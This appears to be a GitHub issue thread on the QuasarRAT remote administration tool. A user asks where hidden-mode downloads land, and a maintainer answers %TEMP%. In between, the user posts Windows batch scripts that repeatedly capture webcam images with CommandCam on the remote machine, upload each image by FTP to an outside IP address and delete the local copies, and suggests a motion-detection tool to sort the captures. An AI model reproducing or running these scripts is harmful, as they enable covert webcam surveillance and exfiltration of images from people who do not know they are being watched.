### ISSUE TITLE
Where is remote execute downloaded in?

### ISSUE THREAD

**Issue by webiummedia** [quasar/QuasarRAT#397]
I just used the remote execute file to download and execute a exe in hidden mode. Where's the file located at? I need to move it via command line.

**Comment by webiummedia** [comment]
Would be nice if we could specify the directory to download in ...

**Comment by webiummedia** [comment]
Actually, i just noticed we can drag and drop in the file manager lol 
Take a look at this: https://github.com/tedburke/CommandCam
Works great. you just  type commandcam in the folder the exe is in and it creates a webcam image

**Comment by webiummedia** [comment]
Something like this and we get an image every few seconds =)

 @echo off
 :begin
 C:\CommandCam.exe /delay 5000 /filename C:\%time:~-11,2%%time:~-8,2%%time:~-5,2%.bmp
 goto begin

**Comment by webiummedia** [comment]
FTP the image to remote server like this then delete the file

@echo off

:begin

SET foo=%time:~-11,2%%time:~-8,2%%time:~-5,2%
set FileName=Build-%date%-%time:~0,2%-%time:~3,2%-%time:~6,2%

C:\CommandCam.exe /delay 50000 /filename C:\%FileName%.bmp

echo user ***> ftpcmd.dat
echo ***>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo put C:\%FileName%.bmp>> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat 209.200.6.84
del ftpcmd.dat
DEL C:\%FileName%.bmp

goto begin

**Comment by webiummedia** [comment]
Then for those intrested, you can use something like http://sourceforge.net/projects/phpmotiondetect/ to sort out the images and keep only those that are not similar (motion detect)

**Comment by MaxXor** [comment]
@webiummedia Downloaded files are located in `%TEMP%`.
